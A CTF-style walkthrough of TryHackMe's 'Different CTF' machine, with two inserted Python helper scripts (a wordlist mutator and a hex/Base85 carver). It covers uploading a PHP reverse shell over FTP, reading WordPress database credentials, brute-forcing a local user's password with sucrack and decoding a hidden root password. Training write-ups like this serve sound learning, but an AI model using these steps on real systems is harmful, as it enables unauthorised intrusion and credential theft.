Hello everyone. Today I will explain how you can hack the "Different CTF" machine. Let's start.
nmap -sN -sV <ip>
Nmap enumerates the open ports and their service versions (-sV). Note that -sN is a TCP NULL scan; on most Linux targets it only reports ports as open|filtered, so a plain SYN scan (-sS) or the default scan gives clearer results. FTP is open, but anonymous login is not allowed. Let's check the website.
The site runs WordPress. WordPress builds its links and asset URLs from the configured site URL, so the page only renders properly when you visit it by that hostname, and the hostname is visible in the page source. Add the IP address and this domain to /etc/hosts so the browser can resolve it.
Now it looks right. Next, let's scan for hidden directories with gobuster.
gobuster dir -u http://ip/ -w <wordlist-path>
Let's check the <hidden> directory. It contains two files, which I downloaded with wget.
wget http://ip/<hidden>/wordlist.txt
wget http://ip/<hidden>/austrailian-bulldog-ant.jpg
The image probably has a message hidden inside it. steghide needs a passphrase to extract anything, so I'll try to crack it with wordlist.txt using Stegcracker, which runs steghide against every candidate in the wordlist.
Stegcracker usage:
stegcracker <file> <wordlist>
Stegcracker recovered the passphrase. I extracted the hidden file with steghide and found a base64-encoded string (an encoding, not a hash, so it decodes directly).
steghide --extract -sf austrailian-bulldog-ant.jpg
Decoding it gave the FTP username and password.
Logging in to FTP with those credentials shows the web files, so I can upload a PHP reverse shell and trigger it through the website.
You can download php-reverse-shell.php from Pentestmonkey's GitHub page. Edit the $ip and $port variables to point at your machine and start a listener on that port before triggering the shell.
I changed the file's permissions with chmod (chmod 777 gives read, write and execute to everyone; the web server only needs to read the file, so a tighter mode would also work).
Let's trigger the shell from the website.
We have a problem: the shell does not execute when requested on the main site. The FTP directory is the document root of a different virtual host (a subdomain), so the shell has to be requested through that hostname. Let's look at the web files in FTP for the site configuration.
wp-config.php is there. WordPress stores its database credentials in this file (DB_NAME, DB_USER, DB_PASSWORD), so let's read it.
It gave me a database username and password, which also log in to the phpMyAdmin panel.
Let's look inside phpmyadmin1.
The subdomain was listed in the wp_options table, where WordPress keeps its siteurl and home values. Let's add the subdomain to /etc/hosts as well.
Now let's trigger the reverse shell again through the subdomain.
The shell works, but I want a fully interactive TTY.
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z   (background the shell)
stty raw -echo && fg
<enter>
stty rows <rows> columns <columns>   (use the values shown by "stty -a" in a local terminal)
Let's find the web flag.
Good job! Now I need to log in as the hakanbey user for the user flag.
I will use the sucrack tool to brute-force hakanbey's password (you can download it here). Both the FTP password and the image passphrase ended in 123***, so it is worth appending 123*** to every line of the wordlist.
I wrote a Python script that appends 123*** to each line:
python <file-name>
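As an added example (not the writeup's own script), here is a wordlist mutator that does what the step above describes and a little more: it appends a fixed suffix to every candidate, optionally keeps the bare word and a prefixed variant, skips blank lines and drops duplicates so sucrack does not waste attempts. The suffix 123*** is the writeup's masked value, and the words in the demo are constructed sample input.

```python
"""Wordlist mutator: append the observed password suffix to every candidate.

Added example, not the writeup's script. SUFFIX holds the writeup's masked
value 123***; replace it with the real suffix the FTP and steghide passwords
ended with. The words used in the demo at the bottom are constructed input.
"""
import sys

SUFFIX = "123***"  # masked in the writeup; substitute the suffix actually observed


def mutate(words, suffix=SUFFIX, keep_original=False, also_prefix=False):
    """Yield candidates built from each word, in input order, without duplicates.

    For every non-empty line: word+suffix, optionally the bare word, and
    optionally suffix+word (in case the shared fragment was a prefix instead).
    """
    seen = set()
    for raw in words:
        word = raw.rstrip("\r\n")
        if not word:
            continue
        candidates = [word + suffix]
        if keep_original:
            candidates.append(word)
        if also_prefix:
            candidates.append(suffix + word)
        for cand in candidates:
            if cand not in seen:
                seen.add(cand)
                yield cand


def mutate_file(src, dst, **opts):
    """Rewrite src into dst, one mutated candidate per line; return the count."""
    # surrogateescape keeps non-UTF-8 bytes from real-world wordlists intact
    with open(src, encoding="utf-8", errors="surrogateescape") as fin, \
         open(dst, "w", encoding="utf-8", errors="surrogateescape") as fout:
        count = 0
        for cand in mutate(fin, **opts):
            fout.write(cand + "\n")
            count += 1
    return count


if __name__ == "__main__":
    if len(sys.argv) == 3:
        n = mutate_file(sys.argv[1], sys.argv[2])
        print(f"wrote {n} candidates to {sys.argv[2]}")
    else:
        # constructed sample input: a blank line and a duplicate are dropped
        for cand in mutate(["hakanbey", "", "password\n", "hakanbey"], keep_original=True):
            print(cand)
```

Run it as `python mutate.py wordlist.txt wordlist-suffixed.txt` and feed the output file to sucrack; with no arguments it prints the constructed demo.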
I downloaded the sucrack package to my own machine and served it with Python's built-in web server:
python -m SimpleHTTPServer   (this is the Python 2 module; on Python 3 use the http.server module instead)
Then I fetched it from the reverse shell into /tmp, which is world-writable, so the web server user can write there without being hakanbey or root:
wget http://<ip>/<file-name>
Let's unpack the sucrack .deb package (dpkg -x only extracts it, so no root privileges are needed):
dpkg -x <filename> <foldername>
cd <foldername>/usr/bin
./sucrack -u hakanbey <wordlist>
(You can see help menu with “./sucrack -h”)
Now i can login hakanbey user.
Let's look for SUID binaries:
find / -perm -u=s -type f 2>/dev/null
/usr/bin/binary stands out. Running it under ltrace shows the library calls it makes while it runs, which reveals what answer it expects.
When I run it normally and enter the correct answer, it gives me hint.txt and root.jpg.
The hint says to open the image in a hex editor and look at offset 00000020 (0x20); the word "CyberChef" appears there, so the bytes at that offset are an encoded string to decode. I started the Python web server again on the box and downloaded root.jpg to my own machine.
Following the hint in the TryHackMe room, the CyberChef recipe is From Hex, then To Base85.
That gave me the root password.
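The last step, reading the bytes at offset 0x20 of root.jpg and running them through CyberChef, can be done in Python instead. The script below is an added example, not from the writeup: it carves the run of hex characters at a given offset and applies a small table of CyberChef-style operations, so both the recipe as the writeup lists it (From Hex, To Base85) and the decoding direction (From Hex, From Base85) can be run. root.jpg is not reproduced; build_sample_image() constructs a stand-in with a hypothetical secret planted as hex(Ascii85(secret)), so the decoding recipe recovers it.

```python
"""Carve a hidden string from a fixed file offset and run CyberChef-style
operations on it. Added example; the image bytes and the planted secret are
constructed, not the room's root.jpg or its real password."""
import base64
import binascii

HEX_CHARS = frozenset(b"0123456789abcdefABCDEF")

# CyberChef-style operations. CyberChef's Base85 default alphabet is the
# standard Ascii85 one (!-u), which is what base64.a85encode/a85decode use.
OPS = {
    "From Hex": lambda b: binascii.unhexlify(b.strip()),
    "To Base85": lambda b: base64.a85encode(b),
    "From Base85": lambda b: base64.a85decode(b),
    "From Base64": lambda b: base64.b64decode(b),
}


def carve_hex_run(blob: bytes, offset: int) -> bytes:
    """Return the run of hex digits starting at `offset` (what a hex editor shows there)."""
    end = offset
    while end < len(blob) and blob[end] in HEX_CHARS:
        end += 1
    return blob[offset:end]


def bake(data: bytes, recipe) -> bytes:
    """Apply the named operations in order, like a CyberChef recipe."""
    for name in recipe:
        data = OPS[name](data)
    return data


def build_sample_image(secret: bytes, offset: int = 0x20) -> bytes:
    """Constructed stand-in for root.jpg: a JPEG SOI/APP0 header, the planted
    hex(Ascii85(secret)) string at `offset`, some filler and an EOI marker."""
    header = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    assert len(header) <= offset
    planted = binascii.hexlify(base64.a85encode(secret))
    return header.ljust(offset, b"\x00") + planted + b"\x00" * 16 + b"\xff\xd9"


def recover(blob: bytes, offset: int = 0x20, recipe=("From Hex", "From Base85")) -> str:
    """Carve the hex run at `offset` and bake it; default recipe is the decoding one."""
    return bake(carve_hex_run(blob, offset), recipe).decode()


if __name__ == "__main__":
    img = build_sample_image(b"hypothetical-root-pw")  # hypothetical placeholder secret
    print("hex run at 0x20:", carve_hex_run(img, 0x20).decode())
    print("From Hex, From Base85:", recover(img))
    print("From Hex, To Base85 (recipe as written in the writeup):",
          bake(carve_hex_run(img, 0x20), ("From Hex", "To Base85")).decode())
```

To use it on the real file, read root.jpg into `blob` and call `recover(blob)`; if the result is garbage, try the other recipe order, since the two Base85 directions are easy to confuse.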
Interesting room, you can shoot the sun.
Thanks for read my writeup.
-YAnil Sec